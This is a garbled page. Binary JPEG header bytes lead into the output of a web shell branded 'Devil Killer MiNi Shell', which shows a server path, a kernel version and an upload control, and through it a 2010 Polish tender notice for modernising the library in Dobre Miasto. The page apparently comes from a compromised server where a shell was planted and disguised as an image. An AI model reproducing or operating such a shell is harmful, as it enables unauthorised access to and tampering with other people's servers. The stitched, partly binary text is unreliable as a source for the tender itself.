JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100621/160459-N-2010.html

<p class="kh_header"><b>Dobre Miasto: Modernizacja zabytkowego budynku Miejsko - Gminnej Biblioteki Publicznej w Dobrym Mieście z rozszerzeniem funkcji do Lokalnego Centrum Kultury</b><br>
<b>Numer ogłoszenia: 160459 - 2010; data zamieszczenia: 21.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobre Miasto , ul. Warszawska 14, 11-040 Dobre Miasto, woj. warmińsko-mazurskie, tel. 089 6161425, faks 089 6161443.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobremiasto.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja zabytkowego budynku Miejsko - Gminnej Biblioteki Publicznej w Dobrym Mieście z rozszerzeniem funkcji do Lokalnego Centrum Kultury.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na modernizacji zabytkowego budynku Miejsko - Gminnej Biblioteki Publicznej z rozszerzeniem funkcji do Lokalnego Centrum Kultury, zlokalizowanego przy ul. Górnej w Dobrym Mieście. 
2.	Budynek objęty przedmiotem zamówienia jest obiektem zabytkowym, wpisanym do rejestru zabytków województwa olsztyńskiego na podstawie decyzji Wojewódzkiego Konserwatora Zabytków z 3 września 1968r.  pod numerem A-1154,  jako kościół ewangelicki z XIX wieku. Obecnie  obiekt pełni funkcję Miejsko - Gminnej Biblioteki Publicznej oraz Centrum Kultury w Dobrym Mieście. 
3.	Powierzchnia objęta przedmiotem zamówienia wynosi: powierzchnia zabudowy - 633,67 m2, kubatura - 7 055,69 m3.
4.	Zakres zamówienia obejmuje: adaptację poddasza na salę ekspozycyjną oraz pomieszczeń przy sali na zaplecze socjalno - sanitarne; budowę dźwigu osobowego; przedłużenie istniejącej klatki schodowej z poziomu piętra na poddasze; wykończenie wieży; montaż zegarów na ścianach zewnętrznych wieży; remont elewacji z wymianą stolarki okiennej i drzwiowej; remont pozostałych pomieszczeń; budowę wentylacji mechanicznej;  wymianę instalacji elektrycznej, wodno - kanalizacyjnej i centralnego ogrzewania wewnątrz budynku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty remontowe i renowacyjne w wysokości do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie wymagał od Wykonawców zaproszonych do składania ofert, wniesienia wadium w wysokości 40.000 PLN (słownie: czterdzieści tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach składanych przez wykonawców w celu wykazania, że w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wybudował lub wykonał remont kapitalny, co najmniej jednego budynku użyteczności publicznej, na kwotę nie mniejszą niż 1 mln PLN brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach składanych przez wykonawców w celu wykazania dysponowania, co najmniej 1 osobą zdolną do kierowania budową lub robotami, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, przynależącą do właściwej izby samorządu zawodowego oraz posiadającą co najmniej 2 lata stażu pracy na budowie przy zabytkach nieruchomych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach składanych przez wykonawców w celu wykazania:
1.	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 500 tyś. zł.
2.	środków finansowych lub zdolności kredytowej, na kwotę nie mniejszą niż 500 tyś. zł. z uwzględnieniem potrąceń na inne zobowiązania umowne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z wnioskiem o dopuszczenie do udziału w postępowaniu, Wykonawca złoży następujące dokumenty:
1.	oryginał pełnomocnictwa, w przypadku gdy Wykonawcy wspólnie ubiegają się o zamówienie lub w przypadku, gdy wniosek podpisuje osoba upoważniona, jeżeli upoważnienie nie wynika z innych dokumentów załączonych do wniosku,
2.	w przypadku, jeśli Wykonawca przy wykazywaniu spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając pisemne zobowiązanie innego podmiotu (ów) do oddania mu do dyspozycji na okres wykonania zamówienia:
a.wiedzy i doświadczenia, jeżeli w załączniku nr 3 do wniosku znajdują się roboty, stanowiące zasoby innego podmiotu, którymi Wykonawca będzie dysponował, 
b.osób zdolnych do wykonania zamówienia, jeżeli w załączniku nr 4 do wniosku, Wykonawca wskazał osoby, które stanowią zasoby innego podmiotu,
c.zdolności finansowych, jeżeli Wykonawca będzie polegał na zdolnościach finansowych innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza niż 5, Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających warunki wyboru a każdy z tych Wykonawców otrzyma po 10 pkt za spełnienie każdego z warunków opisanych w pkt III. 3. 
W przypadku, gdy liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, Zamawiający zaprosi do składania ofert tych Wykonawców, którzy otrzymają najwyższe oceny (najwyższe liczby punktów) za spełnienie warunku wiedzy i doświadczenia, tj. wykazania, że w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawcy wybudowali lub wykonali remont kapitalny, co najmniej jednego budynku użyteczności publicznej, na kwotę nie mniejszą niż 1 mln PLN brutto - znaczenie 100%.
Ocena spełniania tego warunku zostanie dokonana poprzez zastosowanie następującego wzoru:

LP =  IBWB/ IBMax X 10 pkt X 100%
		
gdzie:
LP: liczba punktów
IBWB: liczba wybudowanych, wyremontowanych budynków użyteczności publicznej, na kwotę nie mniejszą niż 1 mln PLN brutto
IBMax: maksymalna liczba wybudowanych, wyremontowanych budynków  użyteczności publicznej, na kwotę nie mniejszą niż 1 mln PLN brutto

Ocena dokonana poprzez zastosowanie powyższego wzoru zostanie dokonana z dokładnością do 2 miejsc po przecinku, stosując metodę zaokrąglania, ze 3 cyfrę po przecinku wynoszącą mniej niż 5 pomija się, a 5 i więcej podwyższa się.

W przypadku uzyskania przez Wykonawców równej liczby punktów w zakresie oceny powyższego warunku, o kolejności Wykonawców zadecyduje najwyższa łączna kwota brutto ocenianych robót, tj. robót spełniających wymagania Zamawiającego.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonywanie zmian w umowie w sprawie zamówienia publicznego w następującym zakresie i na następujących warunkach:
1.	Zmiana osób do kierowania budową lub robotami, na pisemny wniosek wykonawcy wraz z uzasadnieniem w przypadku śmierci osoby pełniącej daną funkcję, stanu zdrowia uniemożliwiającego pełnienie danej funkcji lub nagłej rezygnacji z tym, że nowa osoba proponowana do pełnienia funkcji kierownika budowy lub robót zobowiązana jest posiadać uprawnienia i kwalifikacje określone w ogłoszeniu o zamówieniu.  
2.	Zmiana Inspektora Nadzoru Inwestorskiego, z inicjatywy zamawiającego w przypadku stwierdzenia dwukrotnego potwierdzonego na piśmie nie wywiązania się z obowiązków nadzoru zawartych we właściwej umowie lub śmierci osoby pełniącej tę funkcję, stanu zdrowia uniemożliwiającego pełnienie funkcji albo nagłej rezygnacji pod warunkiem, że osoba proponowana do pełnienia tej funkcji będzie posiadała kwalifikacje i uprawnienia wymagane do pełnienia czynności Inspektora Nadzoru Inwestorskiego wymagane przez Zamawiającego.
3.	Zmiana terminu zakończenia robót budowlanych, na pisemny wniosek Wykonawcy wraz z uzasadnieniem lub z inicjatywy Zamawiającego w przypadku zaistnienia sytuacji, której Wykonawca nie był w stanie przewidzieć w chwili zawarcia umowy i nie wynika ona z jego winy czy zaniedbania lub zmiana ta jest korzystna dla Zamawiającego albo jest ona niezbędna dla prawidłowego wykonania zakresu rzeczowego zadania objętego przedmiotem zamówienia.
4.	Zmiana harmonogramu rzeczowo - finansowego, stanowiącego załącznik do umowy w przypadku zmiany terminu zakończenia robót budowlanych, wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót budowlanych albo jeśli zmiana jest korzystna dla Zamawiającego lub jest niezbędna dla prawidłowego wykonania zakresu rzeczowego zadania objętego przedmiotem zamówienia.
5.	Zmiana harmonogramu rzeczowo - finansowego, stanowiącego załącznik do umowy nie może powodować zmiany całkowitego wynagrodzenia wykonawcy, określonego w umowie. 
6.	Zwiększenie kwoty faktur częściowych wystawionych w 2010 roku w przypadku zwiększenia tej kwoty w budżecie Gminy w trakcie roku budżetowego 2010 z zastrzeżeniem, że całkowita kwota wynagrodzenia wykonawcy wynikająca z oferty pozostaje bez zmian.
7.	Zmiana ceny za wykonanie przedmiotu umowy zawartej w umowie w przypadku wprowadzenia ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcom zaproszonym do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2010 godzina 10:00, miejsce: Urząd Miejski w Dobrym Mieście 11-040 Dobre Miasto ul. Warszawska 14 
sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Formularz wniosku o dopuszczenie do udziału w postępowaniu wraz z załącznikami jest dostępny w siedzibie Zamawiającego, tj. 11-040 Dobre Miasto ul. Warszawska 14  (II piętro pok. Nr 27 lub 28).

Wspólne ubieganie się o zamówienie:

1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
2.	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3.	Umocowanie (oryginał pełnomocnictwa) należy przedłożyć wraz z wnioskiem o dopuszczenie do udziału w postępowaniu.
      Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres i rodzaj czynności, do której pełnomocnik został umocowany.  
5.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem.
6.	Dokumenty wymienione w pkt III.4.1) ogłoszenia, Wykonawcy wspólnie ubiegający się o zamówienie składają łącznie (sumarycznie), natomiast dokumenty wymienione w pkt III.4.2) każdy z Wykonawców ubiegających się wspólnie o udzielenie zamówienia, zobowiązany jest złożyć oddzielnie. 
7.	Wykonawcy wspólnie ubiegający się o zamówienie, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
8.	W przypadku wybrania oferty Wykonawców wspólnie ubiegających się o zamówienie. Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych podmiotów. 

Sposób przygotowania wniosku:

1.	Wniosek wraz z załącznikami należy sporządzić w języku polskim, w formie pisemnej zgodnie z wzorami przekazanymi Wykonawcy.
2.	Wszelkie koszty związane z przygotowaniem i złożeniem wniosku ponosi Wykonawca.
3.	Wniosek musi być podpisany przez osoby uprawnione do reprezentowania wykonawcy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym i wymogami ustawowymi, bądź umocowane przez te osoby na podstawie odrębnego pełnomocnictwa. 
4.	W przypadku, gdy wykonawcę reprezentuje pełnomocnik, oryginał pełnomocnictwa musi być dołączony do wniosku chyba, że pełnomocnictwo wynika z innych dokumentów wraz z nim składanych.
 UWAGA! treść pełnomocnictwa powinna dokładnie określać zakres i rodzaj czynności, do        których pełnomocnik został umocowany.  
5.	Dokumenty składane w celu wykazania spełniania warunków udziału w postępowaniu sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
6.	Dokumenty mogą być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem. Dokument pełnomocnictwa składany w formie kopii musi być poświadczony za zgodność z oryginałem przez notariusza.
